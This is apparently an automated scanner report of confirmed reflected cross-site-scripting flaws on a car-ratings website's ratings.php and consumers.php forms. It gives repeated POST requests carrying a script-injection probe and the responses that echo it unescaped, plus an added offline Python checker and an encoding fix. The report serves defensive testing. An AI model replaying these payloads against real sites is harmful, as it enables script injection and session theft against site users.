<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000DD7)</script>" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
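The three findings above share one pattern: the probe sent in a POST parameter comes back in the HTML with its markup intact, once in a text node (client_dao_authenticate.php, userID, inside the blogtitle span) and once inside a quoted attribute value (ratings.php, numCars, in a hidden input). The following Python helper is an added example, not part of this report and not code from the scanned site. It reproduces the check behind the CONFIRMED verdict on captured request/response pairs copied from the two findings, reports which parse context the probe landed in, and then shows that a context-correct encoder turns the same response into a non-finding. The names probe_value, reflection_context, confirmed, render_user_id and render_hidden_input are mine, and the two render_* functions are an assumed fix (html.escape with quote=True, the counterpart of PHP's htmlspecialchars with ENT_QUOTES), not the application's code. It runs offline; no request is sent.

```python
"""
Triage helper for reflected-XSS findings in a scanner report.

Added example: not part of the original report and not code from the scanned
application. It reproduces the check behind a CONFIRMED verdict: the probe sent
in the POST body must come back in the response with its markup intact, so that
the browser parses the injected <script> element. The request bodies and
response fragments below are copied from the report's reflection points
(client_dao_authenticate.php/userID and ratings.php/numCars). The two render_*
functions are an assumed fix, not the site's code.
"""
import html
import re
from typing import Optional
from urllib.parse import parse_qs

# Captured from the report: form-encoded request bodies (the ratings body is
# shortened to its first parameters) and the HTML fragments that reflect them.
AUTH_REQUEST_BODY = (
    "userID='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3e"
    "netsparker(0x000C26)%3c%2fscript%3e&password=3"
)
AUTH_RESPONSE_FRAGMENT = (
    '<p>User ID: <span class="blogtitle">\'"--></style></script>'
    "<script>netsparker(0x000C26)</script></span></p>"
)
RATINGS_REQUEST_BODY = (
    "Year=2011&Make=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e"
    "%3cscript%3enetsparker(0x000DD7)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3"
)
RATINGS_RESPONSE_FRAGMENT = (
    '<input type="hidden" name="numCars" id="numCars" size="1" '
    'value="\'"--></style></script><script>netsparker(0x000DD7)</script>" />'
)

# The scanner's canary: a <script> element whose hex id ties the reflection
# back to the exact parameter that was probed.
CANARY = re.compile(r"<script>netsparker\((0x[0-9A-Fa-f]+)\)</script>")


def probe_value(request_body: str, param: str) -> str:
    """Decode the form-encoded body and return the raw probe sent in `param`."""
    return parse_qs(request_body, keep_blank_values=True)[param][0]


def reflection_context(response_body: str, probe: str) -> Optional[str]:
    """
    Where the probe landed in the response:
      'attribute'  verbatim, inside a quoted attribute value (the leading '" closes it)
      'text'       verbatim, in a text node or other non-attribute position
      'encoded'    present only with < > " ' HTML-encoded: not exploitable as sent
      None         not reflected at all
    """
    idx = response_body.find(probe)
    if idx != -1:
        # What precedes the probe tells us the parser's context at that point.
        if re.search(r"""=\s*["']$""", response_body[:idx]):
            return "attribute"
        return "text"
    if html.escape(probe, quote=True) in response_body:
        return "encoded"
    return None


def confirmed(response_body: str, probe: str) -> bool:
    """True when the probe's own <script> element survives verbatim in the page."""
    canary = CANARY.search(probe)
    return (
        canary is not None
        and canary.group(0) in response_body
        and reflection_context(response_body, probe) in ("attribute", "text")
    )


# Assumed fix (not the site's code): encode for the HTML context on output.
# html.escape(quote=True) encodes & < > " and ', the same set as PHP's
# htmlspecialchars($v, ENT_QUOTES, 'UTF-8').
def render_user_id(value: str) -> str:
    return '<p>User ID: <span class="blogtitle">%s</span></p>' % html.escape(value, quote=True)


def render_hidden_input(name: str, value: str) -> str:
    safe_name = html.escape(name, quote=True)
    return '<input type="hidden" name="%s" id="%s" value="%s" />' % (
        safe_name, safe_name, html.escape(value, quote=True)
    )


if __name__ == "__main__":
    cases = (
        ("client_dao_authenticate.php userID", AUTH_REQUEST_BODY, "userID", AUTH_RESPONSE_FRAGMENT),
        ("ratings.php numCars", RATINGS_REQUEST_BODY, "numCars", RATINGS_RESPONSE_FRAGMENT),
    )
    for label, body, param, fragment in cases:
        probe = probe_value(body, param)
        print(label, reflection_context(fragment, probe), confirmed(fragment, probe))
    probe = probe_value(AUTH_REQUEST_BODY, "userID")
    print("after encoding:", reflection_context(render_user_id(probe), probe), confirmed(render_user_id(probe), probe))
```

The probe's leading '" is what makes the attribute case work: the double quote closes the value="..." attribute of the hidden input before the stray </style></script> and the canary <script> are parsed. That is why the helper reports the attribute context separately, and why the fix must encode quotes as well as angle brackets (ENT_QUOTES in PHP, quote=True here); an encoder that handles only < and > still leaves an attribute-context reflection breakable.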
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000E0E)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E0E)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:55:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<table width="100%" class="text" cellpadding="5">
<tr>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000E0E)</script>" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000E0F)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E0F)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:55:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<table width="100%" class="text" cellpadding="5">
<tr>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000E0F)</script>" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000E10)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E10)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<table width="100%" class="text" cellpadding="5">
<tr>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x000E10)</script>" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST '"--></style></script><script>alert(0x000E88)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&Make=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E88)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:56:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div 